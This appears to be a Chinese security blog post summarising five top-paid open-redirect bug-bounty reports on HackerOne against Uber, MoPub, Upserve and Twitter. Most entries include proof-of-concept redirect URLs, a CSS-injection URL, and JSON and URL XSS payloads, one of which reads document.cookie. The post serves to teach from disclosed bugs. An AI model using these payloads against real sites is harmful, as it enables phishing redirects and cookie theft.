白帽故事 · 2024年8月16日 0

hackerone上TOP5的开放重定向漏洞

1.central.uber.com的开放重定向漏洞

  • 厂商:Uber
  • 赏金奖励: $8,000
  • 漏洞披露:未披露

2.uber.com 的开放重定向及反射XSS多个漏洞

  • 厂商:Uber
  • 赏金奖励:$3,000
  • 漏洞披露:

开放重定向

开放重定向URL来自 uber.com/en//example.com/

CSS 注入

该漏洞通过 URL uber.com/?theme=../en//example.com/css-code.css%23 中的 theme 参数实现,如下所示:

<link rel="stylesheet" id="theme-css" href="https://uber.com/stylesheets/../en//example.com/css-code.css#.css">

浏览器将会从 example.com/css-code.css 加载CSS 代码。

反射型XSS

该漏洞是由 API 请求过滤不足而引起,因此,在受控域上,放置了一个包含以下内容的 JSON 文件:

{  
   "id":"9999",
   "title":"XSS on Uber.com",
   "overview":"<svg onload=\"alert('XSS on '+ document.domain)\">",
   "responsibilities":null,
   "qualifications":null,
   "lastUpdated":"2016-01-16 06:29 AM",
   "formattedTeam":"xss",
   "team":"xss",
   "subTeam":"xss",
   "formattedLocation":"xss",
   "slugs":{  
      "team":"xss",
      "subTeam":"xss",
      "city":"xss",
      "country":"xss"
   },
   "city":"xss",
   "country":"xss",
   "jobUrl":"javascript:alert('XSS on '+ document.domain)",
   "normalizedTitle":"xss",
   "normalizedContent":"xss"
}

然后在 uber.com/cities/%252e%252e%2f%252e%252e%2fen%2f%2fexample.com%2ffile.json/ 上发现了类似的 XSS 向量。

浏览器尝试从以下位置加载 JSON 内容: example.com/file.json
uber.com/cities/-CONTROLLED-/ :

{  
   "products":[  
      {  
         "productDisplayType":"uberx",
         "fare":{  
            "safeRideFee":"USD9999.99",
            "perMinute":"USD9999.99",
            "minimum":"USD9999.99",
            "cancellation":"USD9999.99",
            "fareType":"time_plus_distance",
            "base":"USD9999.99",
            "isDistanceUnitMetric":false,
            "perDistanceUnit":"USD9999.99",
            "additionalFees":[  

            ]
         },
         "displayName":"uberX",
         "tagline":"XSS",
         "taxiFareInfo":false,
         "finePrint":[  
            "XSS"
         ]
      },
      {  
         "productDisplayType":"uberxl",
         "fare":{  
            "safeRideFee":"USD9999.99",
            "perMinute":"USD9999.99",
            "minimum":"USD9999.99",
            "cancellation":"USD9999.99",
            "fareType":"time_plus_distance",
            "base":"USD9999.99",
            "isDistanceUnitMetric":false,
            "perDistanceUnit":"USD9999.99",
            "additionalFees":[  

            ]
         },
         "displayName":"uberXL",
         "tagline":"XSS",
         "taxiFareInfo":false,
         "finePrint":[  
            "XSS"
         ]
      }
   ],
   "flatRates":[  

   ],
   "id":9999,
   "cityId":9999,
   "flatRateDisplayNames":[  

   ],
   "geoJson":null,
   "geoPoint":{  
      "latitude":33.951252,
      "longitude":-83.382943
   },
   "slug":"xss",
   "twitterHandle":null,
   "theme":{  
      "name":"united_states",
      "ctaColor":"#57AD57",
      "patternColor":"#4DB5D9",
      "patternColorBackground":"#A6DAEC"
   },
   "rideContent":"XSS",
   "driveContent":"XSS",
   "impactContent":"XSS",
   "name":"<marquee>XSS</marquee><svg onload=\"alert('XSS on '+ document.domain)\">",
   "pageTitle":"XSS",
   "pageDescription":"XSS",
   "productLegalNotice":null,
   "pageConfiguration":{  

   }
}

3. MoPub 登录页的XSS及开放重定向漏洞

  • 厂商:推特
  • 赏金奖励:$1,540
  • 漏洞披露:
  1. URL: https://app.mopub.com/login?next=https://google.com
  2. 访问上面的URL并登录
  3. 登录成功后将被重定向至google.com
  4. 另外还可以通过javascript:alert("xss")实现XSS攻击

file

4. Upserve的开放重定向漏洞

  • 厂商:Upserve
  • 赏金奖励:$1,200
  • 漏洞披露:

https://inventory.upserve.com/http://stanko.sh/

5. dev.twitter.com的XSS及开放重定向漏洞

  • 厂商:推特
  • 赏金奖励:$1,120
  • 漏洞披露:

PoC:
https://dev.twitter.com/https:/%5cblackfan.ru/

XSS PoC:

https://dev.twitter.com//x:1/:///%01javascript:alert(document.cookie)/

file